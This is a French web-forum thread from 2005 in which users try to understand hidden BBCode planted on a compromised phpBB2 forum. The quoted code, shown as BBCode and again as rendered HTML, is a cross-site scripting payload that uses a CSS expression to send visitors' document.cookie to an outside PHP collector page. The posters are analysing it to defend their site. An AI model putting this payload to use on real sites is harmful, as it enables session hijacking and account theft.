UBB+D/HTML

UBB+D/HTML - HTML/CSS - Programmation

Marsh Posté le 31-10-2005 à 00:33:49    

Y a un forum qui a récemment été piraté par un "pharmacien" (il poste des liens sur des "pills.com" ou dans le même style) et un des "dirigeant" du site a découvert ce code caché :
 

Code :
  1. [color=white][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://membres.lycos.fr/adieutac/recup.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color][/color]


 
Une idée sur ça fonction précise?

Reply

Marsh Posté le 31-10-2005 à 00:33:49   

Reply

Marsh Posté le 31-10-2005 à 09:37:01    

ben tu regarde ce que ca donne en code HTML sur le forum.
 
parce que là on a que du bbcode, donc on peut pas te dire ce que ca donne.
 
donc file nous le code une fois généré


---------------
Les CSS c'est bon mangez-en
Reply

Marsh Posté le 31-10-2005 à 18:10:03    

Quand faut se lancer... :sweat:
 

Code :
  1. <span style="color: white"><a href="http://www.ut<a href="http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://membres.lycos.fr/adieutac/recup.php?c='+document.cookie;this.sss=null`style='font-size:0;" target="_blank" class="postlink">" target="_blank" class="postlink">www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://membres.lycos.fr/adieutac/recup.php?c='+document.cookie;this.sss=null`style='font-size:0;]</a></a>'</span>[/color]<br />


 
Un peu le bordel quand même... :pt1cable:

Reply

Marsh Posté le 31-10-2005 à 18:23:00    

Heu, c'est où qu'il a trouvé tout ça? Dans le source de la page en consultant une discution ou dans la base de donnée?
Et c'est quoi comme forum : phpbb, autre?
 
EDIT : Et vous être sur que la pub vient pas simplement d'un compteur gratuit, de vos hébergeur ou d'un script pompé sur le net?

Message cité 1 fois
Message édité par omega2 le 31-10-2005 à 18:23:48
Reply

Marsh Posté le 31-10-2005 à 20:10:24    

omega2 a écrit :

Heu, c'est où qu'il a trouvé tout ça? Dans le source de la page en consultant une discution ou dans la base de donnée?
Et c'est quoi comme forum : phpbb, autre?
 
EDIT : Et vous être sur que la pub vient pas simplement d'un compteur gratuit, de vos hébergeur ou d'un script pompé sur le net?


Le code du message initial, je sais pas où ils l'ont trouvé exactement, mais mon 2ème message, c'est la source HTML une fois le message prévisualiser sur le forum. C'est un phpBB2, il était à la version 2.0.10a (sans commentaire).
 
Sinon, y a pas de pub sur ce site et pas de compteur sur cette page du forum en question. Si on pousse plus loin en allant voir la page "http://membres.lycos.fr/adieutac/", la page est encore en construction, par contre il y a une page "recup.php" qui récupère la valeur de "document.cookie" que l'on retrouve également dans la source pour le forum en code UBB et également dans la source HTML. Ce que je pense être le plus probable, c'est que ce hacker récupère le cookie de la personne qui a malheureusement cliqué sur ce lien qui est généré ou encore pire, tout simplement en chargeant la page, le cookie est envoyé à la page "recup.php" du lien que j'ai mis quelques lignes plus haut.
 
En gros, c'est la partie du code que je comprend, puisque je l'ai testé sur une page perso via un évènement onclick="document.location=document.cookie". Pour le reste, je n'ai pas assez de connaissance pour le déchiffrer de façon à en tirer des conclusions potables. C'est pourquoi je poste ce message ici, en espérant que quelqu'un ou quelques personnes comprennent cette source ou du moins m'aide à trouver la solution en excluant les hypothèses probables.
 
Merci.  [:gtmistral]

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed